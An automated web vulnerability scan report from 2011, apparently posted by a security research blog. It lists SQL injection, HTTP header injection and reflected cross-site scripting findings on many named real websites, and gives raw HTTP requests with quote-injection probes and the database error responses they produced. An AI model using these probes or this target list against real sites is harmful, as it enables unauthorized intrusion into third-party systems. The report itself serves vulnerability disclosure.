SQL Injection, XSS, HTTP Header Injection, Cross Site Scripting, DORK Report, 2-28-2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Research Blog at Mon Feb 28 09:37:13 CST 2011.


1. SQL injection

1.1. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 1]

1.2. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]

1.3. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]

1.4. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [REST URL parameter 1]

1.5. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [REST URL parameter 2]

1.6. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 1]

1.7. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 2]

1.8. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 4]

1.9. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

1.10. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

1.11. http://xhtml.co.il/he/page-700/jQuery [REST URL parameter 2]

1.12. http://xhtml.co.il/ru/page-1013/jQuery.browser [REST URL parameter 2]

2. HTTP header injection

2.1. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 2]

2.2. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 3]

2.3. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 4]

2.4. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 2]

2.5. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 3]

2.6. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 4]

2.7. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 2]

2.8. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 3]

2.9. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 4]

2.10. http://www.accelacomm.com/jlp/csoznee4778' [REST URL parameter 2]

2.11. http://www.csoonline.com/article/486324 [name of an arbitrarily supplied request parameter]

2.12. http://www.csoonline.com/webcast/603308/ [name of an arbitrarily supplied request parameter]

2.13. http://www.csoonline.com/webcast/626992/ [name of an arbitrarily supplied request parameter]

2.14. http://www.csoonline.com/webcast/636963/ [name of an arbitrarily supplied request parameter]

2.15. http://www.csoonline.com/webcast/646474/ [name of an arbitrarily supplied request parameter]

2.16. http://www.csoonline.com/webcast/647171/ [name of an arbitrarily supplied request parameter]

2.17. http://www.csoonline.com/webcast/647466/ [name of an arbitrarily supplied request parameter]

2.18. http://www.csoonline.com/webcast/653065/ [name of an arbitrarily supplied request parameter]

2.19. http://www.csoonline.com/webcast/660768/ [name of an arbitrarily supplied request parameter]

2.20. http://www.csoonline.com/webcast/661718/ [name of an arbitrarily supplied request parameter]

2.21. http://www.csoonline.com/webcast/663332/ [name of an arbitrarily supplied request parameter]

2.22. http://www.csoonline.com/webcast/666090/ [name of an arbitrarily supplied request parameter]

2.23. http://www.csoonline.com/white-paper/647166/ [name of an arbitrarily supplied request parameter]

2.24. http://www.csoonline.com/white-paper/647167/ [name of an arbitrarily supplied request parameter]

2.25. http://www.csoonline.com/white-paper/647168/ [name of an arbitrarily supplied request parameter]

2.26. http://www.csoonline.com/white-paper/647169/ [name of an arbitrarily supplied request parameter]

2.27. http://www.csoonline.com/white-paper/647170/ [name of an arbitrarily supplied request parameter]

2.28. http://www.csoonline.com/white-paper/647442/ [name of an arbitrarily supplied request parameter]

2.29. http://www.csoonline.com/white-paper/660813/ [name of an arbitrarily supplied request parameter]

2.30. http://www.csoonline.com/white-paper/660814/ [name of an arbitrarily supplied request parameter]

2.31. http://www.csoonline.com/white-paper/660815/ [name of an arbitrarily supplied request parameter]

2.32. http://www.csoonline.com/white-paper/660816/ [name of an arbitrarily supplied request parameter]

2.33. http://www.csoonline.com/white-paper/660817/ [name of an arbitrarily supplied request parameter]

2.34. http://www.csoonline.com/white-paper/661715/ [name of an arbitrarily supplied request parameter]

2.35. http://www.csoonline.com/white-paper/661716/ [name of an arbitrarily supplied request parameter]

2.36. http://www.csoonline.com/white-paper/661717/ [name of an arbitrarily supplied request parameter]

2.37. http://www.csoonline.com/white-paper/661813/ [name of an arbitrarily supplied request parameter]

2.38. http://www.csoonline.com/white-paper/661814/ [name of an arbitrarily supplied request parameter]

2.39. http://www.csoonline.com/white-paper/662566/ [name of an arbitrarily supplied request parameter]

2.40. http://www.csoonline.com/white-paper/662571/ [name of an arbitrarily supplied request parameter]

2.41. http://www.csoonline.com/white-paper/662587/ [name of an arbitrarily supplied request parameter]

2.42. http://www.csoonline.com/white-paper/663955/ [name of an arbitrarily supplied request parameter]

2.43. http://www.csoonline.com/white-paper/663956/ [name of an arbitrarily supplied request parameter]

2.44. http://www.csoonline.com/white-paper/664345/ [name of an arbitrarily supplied request parameter]

2.45. http://www.csoonline.com/white-paper/665713/ [name of an arbitrarily supplied request parameter]

2.46. http://www.csoonline.com/white-paper/666169/ [name of an arbitrarily supplied request parameter]

2.47. http://www.csoonline.com/white-paper/666776/ [name of an arbitrarily supplied request parameter]

2.48. http://www.csoonline.com/white-paper/666777/ [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://weekly-prizes.com/ [aff parameter]

3.2. http://weekly-prizes.com/ [sid parameter]

3.3. http://weekly-prizes.com/ [subid parameter]

3.4. http://weekly-prizes.com/1-frame.php [c parameter]

3.5. http://weekly-prizes.com/1-frame.php [name of an arbitrarily supplied request parameter]

3.6. http://weekly-prizes.com/1-frame.php [sid parameter]

3.7. http://weekly-prizes.com/1-frame.php [subid parameter]

3.8. http://weekly-prizes.com/1.php [c parameter]

3.9. http://weekly-prizes.com/1.php [subid parameter]

3.10. http://weekly-prizes.com/1.php [subid parameter]

3.11. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]

3.12. http://www.4shared.com/signUpBox.jsp [REST URL parameter 1]

3.13. http://www.aiglons.com/fr/offre.php [name of an arbitrarily supplied request parameter]

3.14. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]

3.15. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]

3.16. http://www.atr.org/obamas-fy-budgetbr-taxes-more-a5844 [name of an arbitrarily supplied request parameter]

3.17. http://www.au2m8.com/v/ [name of an arbitrarily supplied request parameter]

3.18. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

3.19. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

3.20. http://www.babypronto.com/ [name of an arbitrarily supplied request parameter]

3.21. http://www.battlefieldheroes.com/frontpage/landingPage [REST URL parameter 1]

3.22. http://www.battlefieldheroes.com/frontpage/landingPage [REST URL parameter 2]

3.23. http://www.battlefieldheroes.com/frontpage/landingPage [name of an arbitrarily supplied request parameter]

3.24. http://www.bendbulletin.com/apps/pbcs.dll/article [name of an arbitrarily supplied request parameter]

3.25. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]

3.26. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]

3.27. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [name of an arbitrarily supplied request parameter]

3.28. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [name of an arbitrarily supplied request parameter]

3.29. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

3.30. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

3.31. http://www.cbs.com/primetime/big_bang_theory/video/ [name of an arbitrarily supplied request parameter]

3.32. http://www.chamonix.com/press,104,en.html [name of an arbitrarily supplied request parameter]

3.33. http://www.cheatscodesguides.com/ [name of an arbitrarily supplied request parameter]

3.34. http://www.cheatscodesguides.com/ [name of an arbitrarily supplied request parameter]

3.35. http://www.chmedia.com/ [name of an arbitrarily supplied request parameter]

3.36. http://www.cofrac.fr/ [name of an arbitrarily supplied request parameter]

3.37. http://www.collegehumor.com/cutecollegegirl [REST URL parameter 1]

3.38. http://www.collegehumor.com/cutecollegegirl [name of an arbitrarily supplied request parameter]

3.39. http://www.csoonline.com/module.htm [leadTaxonomy parameter]

3.40. http://www.dailyfinance.com/ [name of an arbitrarily supplied request parameter]

3.41. http://www.dailymotion.com/us [name of an arbitrarily supplied request parameter]

3.42. http://www.davidcorn.com/ [name of an arbitrarily supplied request parameter]

3.43. http://www.dorkly.com/ [name of an arbitrarily supplied request parameter]

3.44. http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/ [name of an arbitrarily supplied request parameter]

3.45. http://www.emedicinehealth.com/script/main/hp.asp [name of an arbitrarily supplied request parameter]

3.46. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]

3.47. http://www.fanhouse.com/ [name of an arbitrarily supplied request parameter]

3.48. http://www.food.com/ [name of an arbitrarily supplied request parameter]

3.49. http://www.forex-direkt.de/ [name of an arbitrarily supplied request parameter]

3.50. http://www.forex-direkt.de/ [name of an arbitrarily supplied request parameter]

3.51. http://www.gamespy.com/ [name of an arbitrarily supplied request parameter]

3.52. http://www.gamespy.com/ [name of an arbitrarily supplied request parameter]

3.53. http://www.gamestats.com/ [name of an arbitrarily supplied request parameter]

3.54. http://www.gamestats.com/ [name of an arbitrarily supplied request parameter]

3.55. http://www.giga.de/ [name of an arbitrarily supplied request parameter]

3.56. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]

3.57. http://www.hidglobal.com/onlineOrderStatusRegistration.php [name of an arbitrarily supplied request parameter]

3.58. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 1]

3.59. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 1]

3.60. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 2]

3.61. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 2]

3.62. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 3]

3.63. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [REST URL parameter 3]

3.64. http://www.intranetjournal.com/ [name of an arbitrarily supplied request parameter]

3.65. http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]

3.66. http://www.iso.org/iso/catalogue_detail.htm [name of an arbitrarily supplied request parameter]

3.67. http://www.isp-planet.com/about/sitemap.html [name of an arbitrarily supplied request parameter]

3.68. http://www.itwhitepapers.com/index.php [REST URL parameter 1]

3.69. http://www.itwhitepapers.com/index.php [name of an arbitrarily supplied request parameter]

3.70. http://www.japan-guide.com/e/e2164.html [name of an arbitrarily supplied request parameter]

3.71. http://www.jazdtech.com/techdirect/ [name of an arbitrarily supplied request parameter]

3.72. http://www.jazdtech.com/techdirect/ [name of an arbitrarily supplied request parameter]

3.73. http://www.kitchendaily.com/chefs/ [name of an arbitrarily supplied request parameter]

3.74. http://www.kledy.co.uk/ [name of an arbitrarily supplied request parameter]

3.75. http://www.kledy.de/bookmarks.php [name of an arbitrarily supplied request parameter]

3.76. http://www.kledy.es/ [name of an arbitrarily supplied request parameter]

3.77. http://www.kledy.eu/ [name of an arbitrarily supplied request parameter]

3.78. http://www.kledy.us/ [name of an arbitrarily supplied request parameter]

3.79. http://www.klivio.com/ [name of an arbitrarily supplied request parameter]

3.80. http://www.linotype.com/ [name of an arbitrarily supplied request parameter]

3.81. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [name of an arbitrarily supplied request parameter]

3.82. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]

3.83. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]

3.84. http://www.mapquesthelp.com/app/answers/detail/a_id/949/ [name of an arbitrarily supplied request parameter]

3.85. http://www.marque-nf.com/ [name of an arbitrarily supplied request parameter]

3.86. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]

3.87. http://www.masstransitmag.com/online/article.jsp [name of an arbitrarily supplied request parameter]

3.88. http://www.mittelstandsblog.de/ [name of an arbitrarily supplied request parameter]

3.89. http://www.mydaily.com/ [name of an arbitrarily supplied request parameter]

3.90. http://www.netvouz.com/ [name of an arbitrarily supplied request parameter]

3.91. http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm [name of an arbitrarily supplied request parameter]

3.92. http://www.newzealand.com/travel/getting-to-around-nz/getting-to-nz/getting-to-nz-home.cfm [name of an arbitrarily supplied request parameter]

3.93. http://www.nydailynews.com/favicon.ico96572' [REST URL parameter 1]

3.94. http://www.nydailynews.com/favicon.ico96572' [REST URL parameter 1]

3.95. http://www.observer.com/author/rex-reed [REST URL parameter 2]

3.96. http://www.observer.com/author/rex-reed [name of an arbitrarily supplied request parameter]

3.97. http://www.ohm-chamonix.com/ [name of an arbitrarily supplied request parameter]

3.98. http://www.omeda.com/cgi-win/cso.cgi [REST URL parameter 1]

3.99. http://www.omeda.com/cgi-win/cso.cgi [REST URL parameter 2]

3.100. http://www.omeda.com/cgi-win/cso.cgi [name of an arbitrarily supplied request parameter]

3.101. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]

3.102. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

3.103. http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter]

3.104. http://www.parentdish.com/ [name of an arbitrarily supplied request parameter]

3.105. http://www.parkcityinfo.com/visitors/lodging-hotels/ [name of an arbitrarily supplied request parameter]

3.106. http://www.pawnation.com/ [name of an arbitrarily supplied request parameter]

3.107. http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter]

3.108. http://www.peppernews.eu/ [name of an arbitrarily supplied request parameter]

3.109. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]

3.110. http://www.politicsdaily.com/ [name of an arbitrarily supplied request parameter]

3.111. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

3.112. http://www.radioshack.com/uc/index.jsp [name of an arbitrarily supplied request parameter]

3.113. http://www.shelterpop.com/ [name of an arbitrarily supplied request parameter]

3.114. http://www.shoppinga.de/ [name of an arbitrarily supplied request parameter]

3.115. http://www.skiamis.com/catered-search.htm [name of an arbitrarily supplied request parameter]

3.116. http://www.slashfood.com/ [name of an arbitrarily supplied request parameter]

3.117. http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter]

3.118. http://www.spiele365.com/ [name of an arbitrarily supplied request parameter]

3.119. http://www.sportspickle.com/ [name of an arbitrarily supplied request parameter]

3.120. http://www.surf-forecast.com/ [name of an arbitrarily supplied request parameter]

3.121. http://www.thecounter.com/ [name of an arbitrarily supplied request parameter]

3.122. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]

3.123. http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07 [name of an arbitrarily supplied request parameter]

3.124. http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07 [name of an arbitrarily supplied request parameter]

3.125. http://www.u-tokyo.ac.jp/index_e.html [name of an arbitrarily supplied request parameter]

3.126. http://www.vbforums.com/ [name of an arbitrarily supplied request parameter]

3.127. http://www.watchmouse.com/en/ [REST URL parameter 1]

3.128. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

3.129. http://www.webmd.com/click [name of an arbitrarily supplied request parameter]

3.130. http://www.wi-fihotspotlist.com/ [name of an arbitrarily supplied request parameter]

3.131. http://www.wifesbank.com/ [name of an arbitrarily supplied request parameter]

3.132. http://www.worldmastiffforum.com/ [name of an arbitrarily supplied request parameter]

3.133. http://www.wovencube.com/ [name of an arbitrarily supplied request parameter]

3.134. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [REST URL parameter 2]

3.135. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [REST URL parameter 2]

3.136. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [name of an arbitrarily supplied request parameter]

3.137. http://www.yasni.de/ [name of an arbitrarily supplied request parameter]

3.138. http://xhtml.co.il/he/page-700/jQuery [name of an arbitrarily supplied request parameter]

3.139. http://xhtml.co.il/ru/page-1013/jQuery.browser [name of an arbitrarily supplied request parameter]

3.140. http://ziggymedia.go2cloud.org/aff_c [source parameter]

3.141. http://ziggymedia.go2cloud.org/aff_r [aff_id parameter]

3.142. http://ziggymedia.go2cloud.org/aff_r [offer_id parameter]

3.143. http://ziggymedia.go2cloud.org/aff_r [url parameter]

3.144. http://zjmps.com/click/ [a parameter]

3.145. http://zones.computerworld.com/ncircle/registration.php [from parameter]

3.146. http://zones.computerworld.com/ncircle/registration.php [from parameter]

3.147. http://zones.computerworld.com/ncircle/registration.php [src parameter]

3.148. http://zones.computerworld.com/ncircle/registration.php [src parameter]

3.149. http://zones.computerworld.com/ncircle/registration.php [tab parameter]

3.150. http://www.au2m8.com/v/ [Referer HTTP header]

3.151. http://www.hidglobal.com/onlineOrderStatusRegistration.php [Referer HTTP header]

3.152. http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml [User-Agent HTTP header]

3.153. http://www.liverpoolonlinedegrees.co.uk/2x/prequal.jsp [Referer HTTP header]

3.154. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

3.155. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

3.156. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

3.157. http://www.watchmouse.com/en/ [Referer HTTP header]



1. SQL injection
There are 12 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.



1.1. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /15'/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 28 Feb 2011 13:34:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1550
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=HDMEPKABFIDKGHLDBBPEONOM; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.2. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 28 Feb 2011 13:34:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5641
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Feb 2011 13:34:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11282
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=DEMEPKABPDKMPIFIEPHCPJCM; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

1.3. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 28 Feb 2011 13:34:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1556
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=PLMEPKABHGPCPAANBPOPHCFP; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22'</title>
<meta name="descri
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22'' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 28 Feb 2011 13:34:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11302
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQABTDA=CMMEPKABGNBAGHJPOIICPEAH; path=/
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''</title>
<meta name="descr
...[SNIP]...

1.4. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /44/811103/1/attorneys/dallas.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /44'/811103/1/attorneys/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/cat/44/1/37711/dallas.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.3.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:00:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1423
Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ATTORNEYS - DALLAS</title>
<meta name="description" content="
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.5. http://www.bizfind.us/44/811103/1/attorneys/dallas.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /44/811103/1/attorneys/dallas.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /44/811103'/1/attorneys/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/cat/44/1/37711/dallas.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.3.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5349
Content-Type: text/html
Cache-control: private


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ATTORNEYS - DALLAS</title>
<meta name="description" content="
...[SNIP]...
<p>Microsoft OLE DB Provider for ODBC Drivers</font>
...[SNIP]...

1.6. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bizfind.us
Path:   /cat/44/1/37711/dallas.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /cat'/44/1/37711/dallas.aspx HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.2.10.1298901533

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Feb 2011 14:00:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1399
